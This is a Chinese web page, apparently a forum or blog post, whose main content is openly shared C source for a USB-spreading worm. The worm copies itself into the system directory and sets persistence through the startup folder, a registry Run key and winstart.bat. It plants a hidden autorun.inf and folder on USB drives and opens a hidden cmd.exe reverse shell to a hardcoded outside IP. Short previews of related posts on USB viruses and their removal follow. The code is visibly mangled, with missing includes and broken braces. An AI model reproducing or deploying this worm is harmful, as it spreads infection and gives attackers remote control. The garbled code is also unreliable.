當然不是我寫的,但會仿寫:
#include "stdafx.h"
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
void initdata();
void virusfunc();
bool checkdisk();
void scandisk();
//void clipcursorr();
lresult callback keyproc(int code, wparam wparam, lparam lparam)
char szdrivername[4] = ;
char sztmp[max_path] = ;
char usb = 0;
void initdata()
//病毒特徵:拷貝本身到系統目錄下並執行
//修改登錄檔啟動項
//在u盤中建立recyc1e.、autorun.inf檔案
//把啟動內容寫入autorun.inf檔案
//加入一些控制電腦的語句
void virusfunc()
;char szname[max_path] = "mianhou.exe";
getmodulefilename(null, szpath, max_path);
getsystemdirectory(sztmp, max_path);
lstrcat(sztmp, "\\");
lstrcat(sztmp, szname);//由u盤感染電腦,szpath是病毒路徑,sztmp是感染電腦後病毒的位置
if ( lstrcmpi(sztmp, szpath))
//拷貝本身到系統目錄下並執行
//sztmp[2] = '\0';
//lstrcat(sztmp, "windows");
char sztmp1[max_path];//sztmp1是windows目錄下的winstart.bat檔案,修改該檔案使病毒成為自啟動
char sztmp2[max_path];
sprintf(sztmp1,"c:\\windows\\winstart.bat");
//createfile(sztmp1, generic_write, file_share_write, 0, create_always, 0, 0);
file *bat;
bat = fopen(sztmp1,"w+");
fprintf(bat,"@ c:\\windows\\system32\\mianhou.exe\n");//病毒自啟動
lstrcpy(sztmp2, "c:\\documents and settings\\all users\\「開始」選單\\程式\\啟動\\mianhou.exe");
copyfile(szpath, sztmp2, false);//修改啟動項
dword dw;
if ( regcreatekeyex(hkey_current_user, "software\\microsoft\\windows\\currentversion\\policies\\explorer\\run", 0l, null, reg_option_volatile, key_all_access, null, &key, &dw) == error_success)
regsetvalueex(key, "1", 0, reg_sz, (byte *)sztmp, lstrlen(sztmp));
regclosekey(key);//修改登錄檔啟動項
dword mianhou1 = 0;
dword mianhou2 = 2;
sleep(10000);
dword dwsize = 2550;
char szstring[2550];
dword dwtype;
if( regopenkey(hkey_current_user, "software\\microsoft\\windows\\currentversion\\explorer\\advanced", &key) == error_success)
}if( regopenkey(hkey_current_user, "software\\microsoft\\windows\\currentversion\\explorer\\advanced", &key) == error_success)}
//從主機感染u盤,產生2個檔案,分別是autorun.inf檔案和recyc1e.目錄,將病毒拷貝到其目錄中
handle filehandle;
char filename[max_path];//filename是autorun.inf的位置
char filepath[max_path];//filepath是u盤中recyc1e.的位置
char exepath[max_path];//exepath是u盤中mianhou.exe的位置
lstrcpy(filepath, &usb);//得到u盤的碟符
lstrcat(filepath, ":\\recyc1e.");
createdirectory(filepath, null);//建立資料夾
lstrcpy(exepath, filepath);
lstrcat(exepath, "\\mianhou.exe");
copyfile(sztmp, exepath, true);//將病毒從電腦主機拷貝到u盤的recyc1e.中
lstrcpy(filename, &usb);
lstrcat(filename,":\\autorun.inf");
filehandle = createfile(filename, generic_write, file_share_write, 0, create_always, 0, 0);//在u盤根目錄下建立autorun.inf檔案
//filehandle = createfile(filename, generic_write, file_share_write, 0, create_new, 0, 0);
char filecontent[max_path] = "[autorun] \n open=.\\recyc1e.\\mianhou.exe \n shell\\1=&開啟(o) \n shell\\1\\command=.\\recyc1e.\\mianhou.exe \n shellexecute=.\\recyc1e.\\mianhou.exe";
dword nwrite;
writefile(filehandle, filecontent, max_path, &nwrite, null); //寫入autorun.inf的內容
setfileattributes(filename, file_attribute_hidden|file_attribute_system|file_attribute_readonly);
setfileattributes(filepath, file_attribute_hidden|file_attribute_system|file_attribute_readonly);//設定autorun.inf檔案和recyc1e.目錄的屬性為系統、唯讀和隱藏
wsadata ws;
socket s;
int ret;
wsastartup(makeword(2,2), &ws);
s = wsasocket(pf_inet, sock_stream, ipproto_tcp, null, 0, 0);
struct sockaddr_in server;
server.sin_family = af_inet;
server.sin_port = htons(830);
server.sin_addr.s_addr = inet_addr("28.53.217.111");
connect(s, (struct sockaddr *)&server, sizeof(server));
startupinfo si;
zeromemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwflags = startf_useshowwindow|startf_usestdhandles;
si.wshowwindow = sw_hide;
si.hstdinput = si.hstdoutput = si.hstderror = (void *)s;
char cmdline = "cmd.exe";
process_information processinformation;
ret = createprocess(null, cmdline, null, null, 1, 0, null, null, &si, &processinformation);
}bool checkdisk()
}return false;
}void scandisk()
}int apientry winmain(hinstance hinstance,
hinstance hprevinstance,
lpstr
lpcmdline,
int
ncmdshow)
vbsU盤傳播病毒
if fso.fileexists c autorun.inf then set objfolder fso.getfile c autorun.inf else wsh.run cmd c echo autorun c autorun.inf echo open x.bat c autorun.i...
U盤病毒的清除
最近,身邊大部分人的機子都種了一種病毒 sal.xl e 會在磁碟右鍵選單中多出乙個auto選項 如圖 先不管這個病毒有什麼危害先,只要是病毒我們就要刪除 具體刪除辦法 1.alt shift del調出任務管理器,結束algssl.exe msfir80.exe msime80.exe這三個程序 ...
U盤中病毒了
往u盤裡拷東西的時候突然發現乙個字尾名為exe圖示卻是資料夾的圖示的檔案。大概二三百k 按型別排序之後發現好幾個這樣的檔案,大小都是一模一樣的,名字分別跟我u盤裡原先的資料夾對應,原本的資料夾都被設定成 隱藏 了。我也沒去點它,直接格式化u盤了,反正裡面沒東西,也不知道那程式是啥,八成就是病毒了。建...